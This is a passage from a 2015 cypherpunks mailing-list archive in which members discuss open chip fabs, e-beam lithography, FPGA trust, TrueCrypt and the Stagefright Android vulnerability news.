> What are the alternatives? > > hosting your own??? > jeez. And once you do that, also let a few friends in, so that people without the m4d sk1llz required to configure a mailserver and stay off of spamlists also have the opportunity to get off of gfail. ;) -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From oshwm at openmailbox.org Tue Jul 28 15:40:55 2015 From: oshwm at openmailbox.org (oshwm) Date: Tue, 28 Jul 2015 23:40:55 +0100 Subject: True Crypt is Not Secure In-Reply-To: References: <1437752365-sup-6750@metis.syd1.tesser.org> Message-ID: <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 So is anyone working on building an 'openfab' or is it such a big task that everyone just backs away in horror? :D On 28 July 2015 22:04:38 BST, grarpamp wrote: >> TrueCrypt has been audited[0] and come through relatively unscathed; >> I'd trust it over a Microsoft product I'd need to disassemble to >> examine any day. > >You may trust your opensource code but would still need to >disassemble and audit any critical and closed windows libs and >system interfaces you compile against, let alone run in / under. >This is the trouble with closed platforms. You have some luck >with open unix, but the luck buck currently stops at the iron and >the hardware is getting worse. And we don't have any open fabs on >the horizon to solve it. This is BAD. -----BEGIN PGP SIGNATURE----- Version: APG v1.1.1 iQI7BAEBCgAlBQJVuAT2Hhxvc2h3bSA8b3Nod21Ab3Blbm1haWxib3gub3JnPgAK CRAqeAcYSpG1iCCOD/0YW09ajR9GYClZ4eD4bbwxvjBbe7AfhBDurbFYiMm07dM5 wRtbjeheWOLFjBWHVGWFaA7TnUN+z2qAvPqzvJzRXu78tBOXtNtgXh7Ey541Z836 mONsRDeuD7EHOxy4RN/bNsqIanWGUjgAfpuaP7hcgMNF5R2ihcWli2Fl7kdfgv1H 6mFqoMB20NDUetIRqJlr4T8yyRJk3GuRi1netkHL1AW/VAvXECD3HCz3Hj2hAwXK lKqA2XHFYoZkhdD6/vWTqe8wtiUNd5ICjU5RxqVLbqpQzlnliKARKQpPcKCqTiFZ BMcPSQHsNKyulGEgZsphXg33edvBoUcud5+a+mE4Cn2UleHbgm3bp/X0P6vBcXv9 A46PlHAEuO+DJaGX3Ophg4yCmC6d97tN2xOQv1lfuJGF5hytPJpDcQQbZDwg0Lxw T69cl16rQe0lZO/6lXxkOLRo8iex6DEtP98fEEdbvmJyC49SKWEZVGq9663J+ZwI Qmry6ob1JbKnz9MwlroOm6jGdQZ08sM+1wQzA6hONo0MGhi8ZbKSKjIhumr5TQVy gHp1FFojxVUctsfTGneHNo8tvk2WJRzezNiH/cLJ41A6yYPVVOyASlxT2tkn9DlO h0NIDD4UH9juHLDOvdNK4BNKWdDV7khP6bGYx/NwV2RVHys8HhpX+NPq+QeZbw== =3fLH -----END PGP SIGNATURE----- From jdb10987 at yahoo.com Tue Jul 28 17:15:25 2015 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 29 Jul 2015 00:15:25 +0000 (UTC) Subject: True Crypt is Not Secure In-Reply-To: References: Message-ID: <1992332927.4568274.1438128925995.JavaMail.yahoo@mail.yahoo.com> From: Seth On Tue, 28 Jul 2015 15:40:55 -0700, oshwm wrote: >> -----BEGIN PGP SIGNED MESSAGE----- >> Hash: SHA512 > >> So is anyone working on building an 'openfab' or is it such a big task  >> that everyone just backs away in horror? :D >My understanding is that the capital costs involved with building and  >operating a chip fabrication plant are astronomical, although the  >situation may be getting better.  >http://spectrum.ieee.org/semiconductors/design/the-new-economics-of-semiconductor-manufacturing Even 30 years ago, there were custom fabs that were designed to allow small organizations to get chips fabbed.  This may be one of the modern version of them:  http://www.globalfoundries.com/manufacturing/manufacturing-overview In the mid 80's, they typically purchased older fabs (not state of the art) and allowed small companies to prototype their semiconductor designs.  Today, some of them apparently do near-state-of-the-art production.               Jim Bell -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 3530 bytes Desc: not available URL: From seanl at literati.org Tue Jul 28 20:17:03 2015 From: seanl at literati.org (Sean Lynch) Date: Wed, 29 Jul 2015 03:17:03 +0000 Subject: Open Fabs In-Reply-To: References: Message-ID: If you're willing to sacrifice some performance and power efficiency, you can always use an FPGA. The tools aren't open, but it seems like it would be a lot harder to make an FPGA or FPGA tools to backdoor arbitrary circuits. You could potentially do the "reflections on trusting trust" thing and detect and backdoor each of the major open source processor cores, but it seems pretty unlikely that such a thing wouldn't leak. On the other hand, I also seriously doubt Intel CPUs are backdoored, so maybe my paranoia isn't properly calibrated. Even if you generally trust Intel, though, FPGAs could still potentially protect you from all the investment the NSA has undoubtedly put into finding bugs and side channels in the widely used CPUs, though. And being much simpler, something like OpenRisc or J1 or SPARC v8 probably has far fewer places for such flaws/side channels to hide. On the gripping hand, none of those processors gives you an equivalent of Intel's TXT mode, and I'm not sure but it's probably much easier to dump internal state from an FPGA, so you could be more vulnerable to cold boot and evil maid attacks. On Tue, Jul 28, 2015, 19:27 grarpamp wrote: > > Steve Kinney wrote: > > If a market is willing to pay enough to support and grow the > > project, it can be done. Are there potential partners and large > > scale consumers for "top security through total transparency" to > > make an open hardware project viable today? > > > > One potential route would be to broker a deal to pool the > > resources of specialty hardware integrators who already have a > > market base for high security "solutions." The Open Office > > project pulled off something similar years ago, obtaining major > > funding and support from IBM and others who wanted Microsoft out > > of their hair. So, who wants a shot at defending some of their > > digital assets from outfits like NSA and GHCQ, badly enough to pay > > for it? > > > > The first place I would start shopping this "crypto anarchist" > > project around would be State security services - pretty much any > > small to mid-sized outfit not in BRICS or FVEYE could be a > > potential market for auditable scrambler phones for military > > commanders, senior elected officials, diplomatic corps and > > double-nought spies. From there to high performance servers and > > workstations would be a natural progression. > > > > I haven't looked at how the Black Phone folks are doing lately, > > but that looks like the kind of product line where open hardware > > might find its first viable home. > > > > Another consideration: One needs not necessarily own the facility > > where the chips are made: ISO quality assurance programs already > > in place support client access for audit and validation. A > > contract that specifies the client's intrusive presence during > > every phase of production and handling would cost extra, but a QA > > process that assumes the presence of hostile actors on the shop > > floor is definitely possible. Such a process would also be needed > > at a dedicated facility: One must assume the presence of hostile > > actors there, too. :o) > > That's basically all part of the idea. And that some serious multi > philosophical combination of hardcore Stallman Ghandi Cpunk > Riseup Coder Maker Opensource Auditor like motherfuckers all > build, run and observe the joint from the ground up as essentially a > crosschecked incorruptible thing that anyone can look at. > > Todays shops are a mutable system of hierarchical employee > paychecks, payoffs, closed door privacy and backroom games. > -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4178 bytes Desc: not available URL: From wirelesswarrior at safe-mail.net Wed Jul 29 00:42:48 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Wed, 29 Jul 2015 03:42:48 -0400 Subject: Open Fabs Message-ID: For CPunks what's needed is a DIY Electron Beam Litho apparatus. Its basically an electron microscope in reverse. For relatively simple chips it could be more than adequate as its possible eliminates the need and complexity, chemistry, etc. for masks and can perform most all process functions (doping, implantation, etc.) and attain feature sizes commensurate with current foundary tech. AFAIK, its possible to build from used e-microscopes though maintaining calibration and linarity is something best learned in a working environment at someone else's expense. :) One of the main shortcomings of EBL is its low production rate since all features must be developed by "writing" them, like an old stylevector display, on the substrate. -------- Original Message -------- From: grarpamp Apparently from: cypherpunks-bounces at cpunks.org To: "cypherpunks at cpunks.org" Subject: Re: Open Fabs Date: Tue, 28 Jul 2015 22:20:41 -0400 > > Steve Kinney wrote: > > If a market is willing to pay enough to support and grow the > > project, it can be done. Are there potential partners and large > > scale consumers for "top security through total transparency" to > > make an open hardware project viable today? > > > > One potential route would be to broker a deal to pool the > > resources of specialty hardware integrators who already have a > > market base for high security "solutions." The Open Office > > project pulled off something similar years ago, obtaining major > > funding and support from IBM and others who wanted Microsoft out > > of their hair. So, who wants a shot at defending some of their > > digital assets from outfits like NSA and GHCQ, badly enough to pay > > for it? > > > > The first place I would start shopping this "crypto anarchist" > > project around would be State security services - pretty much any > > small to mid-sized outfit not in BRICS or FVEYE could be a > > potential market for auditable scrambler phones for military > > commanders, senior elected officials, diplomatic corps and > > double-nought spies. From there to high performance servers and > > workstations would be a natural progression. > > > > I haven't looked at how the Black Phone folks are doing lately, > > but that looks like the kind of product line where open hardware > > might find its first viable home. > > > > Another consideration: One needs not necessarily own the facility > > where the chips are made: ISO quality assurance programs already > > in place support client access for audit and validation. A > > contract that specifies the client's intrusive presence during > > every phase of production and handling would cost extra, but a QA > > process that assumes the presence of hostile actors on the shop > > floor is definitely possible. Such a process would also be needed > > at a dedicated facility: One must assume the presence of hostile > > actors there, too. :o) > > That's basically all part of the idea. And that some serious multi > philosophical combination of hardcore Stallman Ghandi Cpunk > Riseup Coder Maker Opensource Auditor like motherfuckers all > build, run and observe the joint from the ground up as essentially a > crosschecked incorruptible thing that anyone can look at. > > Todays shops are a mutable system of hierarchical employee > paychecks, payoffs, closed door privacy and backroom games. From grarpamp at gmail.com Wed Jul 29 01:44:46 2015 From: grarpamp at gmail.com (grarpamp) Date: Wed, 29 Jul 2015 04:44:46 -0400 Subject: Open Fabs In-Reply-To: References: Message-ID: On Tue, Jul 28, 2015 at 11:17 PM, Sean Lynch wrote: > On the other hand, I also seriously doubt Intel CPUs are backdoored Even if they're not physically backdoored with handy extra gates, they seem logically backdoorable by demanding the signing keys needed for loading microcode (Intel/AMD) and AMT firmware (Intel, don't plug your "LM" series NIC into the WAN.) http://inertiawar.com/microcode/ https://wiki.archlinux.org/index.php/Microcode https://en.wikipedia.org/wiki/Intel_Active_Management_Technology http://invisiblethingslab.com/resources/bh09dc/Attacking%20Intel%20TXT%20-%20paper.pdf http://invisiblethingslab.com/resources/bh09dc/Attacking%20Intel%20TXT%20-%20slides.pdf From sdw at lig.net Wed Jul 29 07:06:40 2015 From: sdw at lig.net (Stephen D. Williams) Date: Wed, 29 Jul 2015 07:06:40 -0700 Subject: another google nugget In-Reply-To: References: <55b74802.c7628c0a.349b.ffff9e4b@mx.google.com> <20150728110953.GA2524@sivokote.iziade.m$> <1438094632.21834.1.camel@moonpatrol> <20150728144734.GM6906@ctrlc.hu> Message-ID: <55B8DDF0.5090402@lig.net> On 7/28/15 8:21 AM, bbrewer wrote: >> On Jul 28, 2015, at 10:47 AM, stef wrote: >> >> is this mailinglist suddenly transformed to the libtech list? cypherpunks i >> believe build their own infrastructure, they work on remailers, and other >> related stuff. what the hell happened? can someone foia what the codeword for >> operation "disrupt cypherpunks mailinglist" is? >> >> the mind boggles. > I wanted to hit the ‘like’ button on this, but I couldn’t find it. My internet must be broken. You do it like this: The original 'Like': +1 And then everyone is supposed to notice and mentally tabulate the results. Or your mail reader could track posts and do it for you, but nobody ever did that. > > (I will agree hosting your own could be the way to go, however, running/admining your own box at home / work or hosted on a VPS each carry with them their own dangers of security, trust, yadda yadda). I've run my own box on the Internet continuously since 1992. But there is a payment history, it's been in the same location for 8 years, etc. When I imagine a more secure (in certain senses) alternative, as least as an individual, it usually involves public cloud services, perhaps in some ephemeral rotating basis way. First you need to secure DNS, or some similar alternative, then... Tor or similar helps for a certain class of usage, but then you're outside the normal Internet world. Without interesting goals, no point in interesting solutions other than knowing how to do interesting solutions and what their limitations are. Which is a good thing in and of itself. > > There is, as you state, a large difference between acknowledging these other options and their upsides/downsides, vs. simply not acknowledging their existence at all. > > Depressing. > sdw -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 2727 bytes Desc: not available URL: From list at sysfu.com Wed Jul 29 07:28:44 2015 From: list at sysfu.com (Seth) Date: Wed, 29 Jul 2015 07:28:44 -0700 Subject: first annual I2Pcon in Toronto August 15-16 #I2PCon #I2PToronto Message-ID: I2P Meetup Hacklab.to Saturday, 15 August 2015 at 2:00 PM - Sunday, 16 August 2015 at 11:30 PM (EDT) Toronto, Ontario https://www.eventbrite.ca/e/i2p-meetup-tickets-17773984466 I should also mention that I2P's budget contains 0% government funding. https://twitter.com/GetI2P/status/583731852504133633 If you have long term concerns (like me) about the Tor project's funded-by-the-adversary-slopping-at-the-government-blood-money-trough funding model, maybe you can (like me) put your money where your mouth is and kick some Bitcoin down to a mixnet privacy project that does suffer from this compromise. From jdb10987 at yahoo.com Wed Jul 29 01:48:58 2015 From: jdb10987 at yahoo.com (jim bell) Date: Wed, 29 Jul 2015 08:48:58 +0000 (UTC) Subject: "Stagefright" text attack to Android. Message-ID: <1666375987.4877635.1438159738041.JavaMail.yahoo@mail.yahoo.com> http://www.theinquirer.net/inquirer/news/2419531/text-based-android-stagefright-attack-is-bad-news-for-950-million-users "A MOBILE SECURITY RESEARCHER has done his work and found a cluster of vulnerabilities in Android that, when combined, present a problem for 95 percent of the user base. This is bad stuff. Despite references to unicorns in the official information, there is also some goosebump-inducing wordplay. The official warning is that almost anyone with an Android mobile phone can be sent one text message and be plunged into security chaos. This threat package has been dubbed Stagefright by Joshua Drake from the security outfit Zimperium zLabs. "Gaining remote code execution privileges merely by having access to the mobile number? Enter Stagefright. The targets for this kind of attack can be anyone from prime ministers, government officials, company executives, security officers to IT managers," said the firm in a blog post. "[We] dived into the deepest corners of Android code and discovered what we believe to be the worst Android vulnerabilities discovered to date. These issues in Stagefright code critically expose 95 percent of Android devices, an estimated 950 million devices." If this does not have you standing on a chair pushing your phone away with a broomstick, then get ready for this. Zimperium said that Stagefright is worse than Heartbleed - and we all know how that worked out." From zen at freedbms.net Wed Jul 29 02:27:53 2015 From: zen at freedbms.net (Zenaan Harkness) Date: Wed, 29 Jul 2015 09:27:53 +0000 Subject: Open Fabs In-Reply-To: References: Message-ID: On 7/29/15, wirelesswarrior at safe-mail.net wrote: > For CPunks what's needed is a DIY Electron Beam Litho apparatus. Its > basically an electron microscope in reverse. For relatively simple chips it > could be more than adequate as its possible eliminates the need and > complexity, chemistry, etc. for masks and can perform most all process > functions (doping, implantation, etc.) and attain feature sizes commensurate > with current foundary tech. AFAIK, its possible to build from used > e-microscopes though maintaining calibration and linarity is something best > learned in a working environment at someone else's expense. :) One of the > main shortcomings of EBL is its low production rate since all features must > be developed by "writing" them, like an old stylevector display, on the > substrate. Whereas with "photon lithography" (terminology?) a light source covers an area (of the mask?) which is then lens-focused down to the appropriate scale (eg 24nm) onto the silicon and etc physical layer? Firstly is this minimal understanding correct? Secondly is there any potential areal electron emission device (as opposed to point electron emission device) comparable to current litho tech (areal photon emission)? From drwho at virtadpt.net Wed Jul 29 09:52:23 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 29 Jul 2015 09:52:23 -0700 Subject: True Crypt is Not Secure In-Reply-To: <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> References: <1437752365-sup-6750@metis.syd1.tesser.org> <0B5F8A86-54B3-4393-AE95-3022BFA7CC53@openmailbox.org> Message-ID: <55B904C7.3050604@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/28/2015 03:40 PM, oshwm wrote: > So is anyone working on building an 'openfab' or is it such a big > task that everyone just backs away in horror? :D The closest I know to that is Jeri Ellsworth, who's at the point of fabbing her own discrete transistors in a homebrew semiconductor foundry. If she's still working on this project, she's probably a bit closer but I haven't spoken to her about it. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Pills for breakfast. I'm so science fictional." --Doktor Sleepless -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVuQS5AAoJED1np1pUQ8RkUnMP+QHfeonmhYgU8gBamP1A6ykB VzCqWRV3bYrRRrwLf5madzIf/1sOEG3qy32AL9R6yk5V2hjuL9OI2Kwks0yNVF0f iKoq/r8gmP8U5XIG8ooZQlgn7/jnkOH/CJu5lGR9fEl98re88mIlQcXYqYt4mFnz mpJZ/JujWN6tiuqUwZR7TjFE8q7LbwdNOfK689b8OFJT1627lvccImmXme1wITZO qdjmo9pMOriBxcZmHLfQkFR7faWrCaNdsaiR0EuhXcMtF/mXoDmwW58VxkbasjXM lc4RaZv2as4qamH8mTGhPiKzC5EY3BMWrzfqiQSt7/mABnz19CL5uCicdK5GVwh3 vlNikIuN1uqG1jQhQhVHBHWkJf/MPeMW8c2lb9F7C7cQc8dKNZ15spY+GSOdXTMU a5mJzl+dGfz039l++h11o74bMoJEnf3Xd/J9c26IJ1UtlFVw+Bw1OhNYDQejM0QZ 5HYVl5g+capGqfcYgcqam6yyQLnS7iU0Mr/zXPIoZ3w6WI2o6af6oChBlyulQ/LC H7nHUqNrq6DUuLe4/DBU+/dOz4o75+l8bwTF3WKaKbRQSCKPg4KoXRYLv4yuKMaV itJV9hnLf3wUQOlPBuqNsIGjIyZL8PNeo2XdUHBKiVPWR+YlJ7O6Ewve5gS0LEbU aWK9Ql9/QSYrSHYuwgdr =l9HE -----END PGP SIGNATURE----- From drwho at virtadpt.net Wed Jul 29 09:54:39 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 29 Jul 2015 09:54:39 -0700 Subject: Open Fabs In-Reply-To: References: Message-ID: <55B9054F.7010908@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/28/2015 06:27 PM, grarpamp wrote: > Universities have always had fabs too. The Rochester Institute of Technology should still have theirs online. Fun times. > Can you as a reasonably learned hobbyist go observe an Intel run > through GloFab from start to finish? What about for the chip > inside your phone? Your makerbot? Your RPi? Your USRP? Your own > mask? No? Well... that's a problem. Open designs that operate much the same way are going to take a while to get up to par, too. There are good FPGA designs, but then the "open gate synthesis" holy wars kick into high gear. Anybody got any popcorn? I'm out. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Pills for breakfast. I'm so science fictional." --Doktor Sleepless -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVuQVPAAoJED1np1pUQ8RkAE4P/RQgja9/HKvU6SFXY6B1Rwdi kERse875CAwBzKgQDzm+KS7EBoDioELxnJ3dzhvcDSWjaTkZd4nLRaGVK1+dHEns 38IUrwYqpWKh7FNqPDdYm1R0JADYe6tFeY0wN94gKK5e5SGSfBiXa4SSo+raJiGp dZ6zo9HKrd1bYoqi4ofqhu80AMq1FsQNNEUwD2Kb577nDJEi7rF39c7NVLjS2BcK fHAIwUIaOKTQxtUNpJuDZvzmAVdX3Hy+EP7DYozijnhY50av00cWVmyguM1XTInE tJipJTpQev9nmQf5XNxe6q1IycIu1ndHJW02JLkHuDA2b6BF7BMIVjcKa+A89uI0 wKokS3IhMqaLK1p8S4qMcwk3aveRLgecvgOu2za2W81YGStdToYtUis4+cFzdBp/ BZqVvxLY1SmxPkWINzBrP4LIynsxN0GqtJo7gJB3v6u+9oG25pWcLxjEsg8OBoT9 itfTik0FArT3iKtOHXFg1SEOI6PDfslD2g32fmz/weeY1bMBVrgv06fM3ThsP8dv 5d55F4Ztp/MfToKMEoUSG0bPmbcFeSMDm46vNX9uronbzvXNW9gQsyyP81HskoQk YTNQ500HM1eKLHwg6/aFVUUYyGwtBcnUiLJQoEtgTqBhwHTYAR2pjt3WIAIOOq2B nRU4JUGMwwcF8JFCTboa =unQ0 -----END PGP SIGNATURE----- From drwho at virtadpt.net Wed Jul 29 09:58:54 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 29 Jul 2015 09:58:54 -0700 Subject: Open Fabs In-Reply-To: References: Message-ID: <55B9064E.5010903@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/28/2015 08:17 PM, Sean Lynch wrote: > of Intel's TXT mode, and I'm not sure but it's probably much easier > to dump internal state from an FPGA, so you could be more > vulnerable to cold boot and evil maid attacks. More likely, dump the contents of the EPROM some FPGAs read their gate matrices out of when they power up. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "Pills for breakfast. I'm so science fictional." --Doktor Sleepless -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVuQZOAAoJED1np1pUQ8RkXDgP/jgt6OPJHKe3XBthaKrVDjJy RAJ8+mS/g8PESioT+a81Vwi0VlxtEWVjIBoXqtdhj7zeybDMu/CI5fP0Bil4VkUY V32fF3PM855+qIyC58JNyfCQrWgNMYoyBNa9QqW/sw2aXppZa+XYC7U6Xf3JxGs2 DE+K8tSvQgkXq8pC8gL3MvADLNoFQ75NO2LAJjmns58I4ZBwEuRw/qAePW8ZdkdH aRW4wAmbwa3LJazCsmrO+nYIIDUdy99g1NkrZMbfb1xYzln6Uv9o5/KpqebojWjU c8/yXxytcZo7p/TSxjn4xkcV23PF9b1LOiPZcSijx6DsNW1Hc/WBU3HKiU37xB9m zSmMB0Ltjs9btM8vEuGBpo/wh3F3Xx/yaW4tVaq+WX9Ly+3u4z8fagBPZ7z0hdiR doXTUUGpBy4uPJVAvwazCdspxoaP59/cLUQ5qdSqyQkJCGlCaGxaEGKzjV6nTpzd 1cWNIWEv6TfqPhgh+pfl3QrcSP2a8x8xShYn+dsiPiAJEOXG+qJAj0ctJSJ0ZOch cwGBAenAnLYpdDZRdhiqavOfr4QEkfiTfu8qdBrFncYu94HXNHJisZH8cDJGRuQ4 cbaDDLe8Nw/08+l6WK9qgcbJA2I6q7/MAIDkwkihGCMyFUhkX1gDimtSJ/ckqXnx T3HrxDupbkHnEGpa2aiS =/p9d -----END PGP SIGNATURE----- From rysiek at hackerspace.pl Wed Jul 29 01:20:16 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 29 Jul 2015 10:20:16 +0200 Subject: True Crypt is Not Secure In-Reply-To: <55B82D8F.3030907@pilobilus.net> References: <55B82D8F.3030907@pilobilus.net> Message-ID: <1627812.qLORAD9xv3@lapuntu> Dnia wtorek, 28 lipca 2015 21:34:07 Steve Kinney pisze: > If a market is willing to pay enough to support and grow the > project, it can be done. Are there potential partners and large > scale consumers for "top security through total transparency" to > make an open hardware project viable today? Yes. And there are ways to create a market like that, albeit it takes time. > (...) > I haven't looked at how the Black Phone folks are doing lately, > but that looks like the kind of product line where open hardware > might find its first viable home. Funny you should ask: http://www.theinquirer.net/inquirer/news/2402536/us-department-of-defence-adopts-nsa-proof-blackphone-devices :) -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From rysiek at hackerspace.pl Wed Jul 29 01:24:34 2015 From: rysiek at hackerspace.pl (rysiek) Date: Wed, 29 Jul 2015 10:24:34 +0200 Subject: Open Fabs In-Reply-To: References: Message-ID: <3362957.fvfkYIsBzA@lapuntu> Dnia wtorek, 28 lipca 2015 21:27:44 grarpamp pisze: > You don't need a $50B 1Msqft setup to start making chips, you need > a floor in a warehouse and some people who believe. Testify, brother! -- Pozdrawiam, Michał "rysiek" Woźniak Zmieniam klucz GPG :: http://rys.io/pl/147 GPG Key Transition :: http://rys.io/en/147 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 931 bytes Desc: This is a digitally signed message part. URL: From s at ctrlc.hu Wed Jul 29 01:52:00 2015 From: s at ctrlc.hu (stef) Date: Wed, 29 Jul 2015 10:52:00 +0200 Subject: Open Fabs In-Reply-To: References: Message-ID: <20150729085200.GP6906@ctrlc.hu> On Wed, Jul 29, 2015 at 03:17:03AM +0000, Sean Lynch wrote: > If you're willing to sacrifice some performance and power efficiency, you > can always use an FPGA. The tools aren't open, but it seems like it would check out icestorm for a counterexample. and a simple cpu implemented on it: http://www.excamera.com/sphinx/article-j1a-swapforth.html > On the other hand, I also seriously doubt Intel CPUs are backdoored, so it's called bugdoor. if they backdoor your system with ME crap, why would they stop at the core? -- otr fp: https://www.ctrlc.hu/~stef/otr.txt From drwho at virtadpt.net Wed Jul 29 11:33:29 2015 From: drwho at virtadpt.net (The Doctor) Date: Wed, 29 Jul 2015 11:33:29 -0700 Subject: Open Fabs In-Reply-To: <20150729180714.GA2509@antiproton.jfet.org> References: <55B9064E.5010903@virtadpt.net> <20150729180714.GA2509@antiproton.jfet.org> Message-ID: <55B91C79.8010203@virtadpt.net> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 On 07/29/2015 11:07 AM, Riad S. Wahby wrote: > But that just gives away the bitstream describing the FPGA > configuration (say, a trusted CPU). Is the CPU's *design* a secret? > If Gate matrices can be reversed (as mentioned earlier). > not, I don't see why it matters that an evil cleaner might read out > the FPGA's configuration. (Obviously, don't store secret keys in > there!) I thought the point being made in the conversation was (and correct me if I'm wrong) that one could dump an arbitrary FPGA's contents to do a security audit on them. Not to say that you're wrong, you make a good point, but it's taking the discussion in a different direction. > If we really are worried about keeping the CPU's design a secret, > it's We were talking about open CPU designs, so why keep them a secret? > possible with many FPGAs to encrypt the configuration bitstream > such that the configuration is decrypted onboard the FPGA at > power-on. This Yeah. It's pretty cool, isn't it? > is intended to handle the case where I want to sell a product that > uses an FPGA without revealing the contents of that FPGA's > configuration to my customers or competitors. That's a few degrees off-center from where the discussion was going, but go ahead. We'll fork() as necessary. > Cue the OTP / epoxy / physical security arms race, I guess. Or the electromechanical processing rigs that a few people have been bringing up over beer lately. Cool idea, but I strongly doubt that they'll scale, or even keep up with the watch on my wrist. - -- The Doctor [412/724/301/703/415] [ZS] PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1 WWW: https://drwho.virtadpt.net/ "The world is not a match for you and me/No matter what we used to say!" --InSoc -----BEGIN PGP SIGNATURE----- iQIcBAEBCgAGBQJVuRx0AAoJED1np1pUQ8Rk8m8QAJD2YA1F5oizOt+C3HiCEAfS zTyPRdlEDb9Dvw1nzZghZklgb2uqeToDIRIOV5SG9R0tYSkct1w4cRSlG89EpDX/ trPDOyimQpMCv0mwASVCh9mGIobcoQYNVBJ+DB070VHjg+YEk+/2FYr1wNBFgTch fIXqzANNmVwwCt0PABs6J9MOmyYGBj+zddLMTIMQmOZv/tAbfLnb8yrqx6i59BUI 6dX0AILoXGbx5ssyxtOdy0bKdGnj7Qxp2MvhrNqbXb4vhKRnWyVt548CASx0EcMl fNwnyMsLCn38coatFhvi2TeyjM8Wm+v73pLlW7nBWvViOugvDlY4SB2MTCVh1A7v 0K2aVnxG+UGmQ/yQNZGSbgXT/hbzkeBBrSHjtYf5KBugdAgVhb1jkwILZjwancsm Xo3KgYJOgVqYWQiLnzYsQWp8sNMwUS8xjneHZm/bWxmcPmcNBzEsR13brp58FB+E FU2euIxRGOIDJQ9HnUy0NXFFQr0DlYcHquyvWeS6dBnhD/BZ0sVGhSwapslUwCH8 5F97AQ5/u8hdGXD5bGggxQmCVmcrgUsV6LhRUB+8EKjCgUUOY8PBcnWxAwfNeVFj 7oQuPEU3Gz1Xx/zg6hiMFICc4nTtnwoQA263aUO7P4xHp9mRYfXZisJ6s97WAQRX za1DvxZXZxbB4QVoOEdm =LiVz -----END PGP SIGNATURE----- From wirelesswarrior at safe-mail.net Wed Jul 29 10:45:01 2015 From: wirelesswarrior at safe-mail.net (wirelesswarrior at safe-mail.net) Date: Wed, 29 Jul 2015 13:45:01 -0400 Subject: Open Fabs Message-ID: -------- Original Message -------- From: jim bell Apparently from: cypherpunks-bounces at cpunks.org To: Zenaan Harkness , "cypherpunks at cpunks.org" Subject: Re: Open Fabs Date: Wed, 29 Jul 2015 16:40:40 +0000 (UTC) ----- Original Message ----- From: Zenaan Harkness On 7/29/15, wirelesswarrior at safe-mail.net wrote: >> For CPunks what's needed is a DIY Electron Beam Litho apparatus. Its >> basically an electron microscope in reverse. For relatively simple chips it >> could be more than adequate as its possible eliminates the need and >> complexity, chemistry, etc. for masks and can perform most all process >> functions (doping, implantation, etc.) and attain feature sizes commensurate >> with current foundary tech. AFAIK, its possible to build from used >> e-microscopes though maintaining calibration and linarity is something best >> learned in a working environment at someone else's expense. :) One of the >> main shortcomings of EBL is its low production rate since all features must >> be developed by "writing" them, like an old stylevector display, on the >> substrate. >Whereas with "photon lithography" (terminology?) a light source covers >an area (of the mask?) which is then lens-focused down to the >appropriate scale (eg 24nm) onto the silicon and etc physical layer? >Firstly is this minimal understanding correct? That's the way things were about 25 or so years ago. Wafers with photoresist were exposed with machines using UV, which over the years used ever-decreasing wavelengths of UV, in equipment:436. 365nm, and 248nm, eventually reaching 193 nanometer UV. In the 1970's, entire wafer-masks (which covered the entire wafer) were used. This became impractical as feature-sizes were reduced. Step-and-repeat devices ("wafer-steppers) https://en.wikipedia.org/wiki/Stepper then allowed exposure of a much smaller portion of a wafer. (these eventually used mirrors, rather than lenses, because it is hard to process UV in a solid lens.) However, because the wavelength of light eventually became a large portion of the size of a chip feature (a line or a space) it was increasingly difficult to 'draw' the picture necessary to expose the resist on the wafer. Due to many ever-more-heroic technologies, it eventually became possible to use 293 nanometer wavelength to expose features far smaller than the wavelength itself, which would have been considered phenomenal in the 1970's. These days, EUV ("extreme ultraviolet") has been used for ever more small features. https://en.wikipedia.org/wiki/Extreme_ultraviolet https://en.wikipedia.org/wiki/Extreme_ultraviolet_lithography EUV is strongly absorbed by air, so such exposure is typically done in a vacuum. > > Is this using near-field optics? There also has been experimentation with soft x-rays using wiggler-type linear accelerators. > > The differences between photons and electrons enables e-microscopes and EBL (which also operates in the vacuum) to avoid the optical-based limitations. > >Secondly is there any potential areal electron emission device (as >opposed to point electron emission device) comparable to current litho >tech 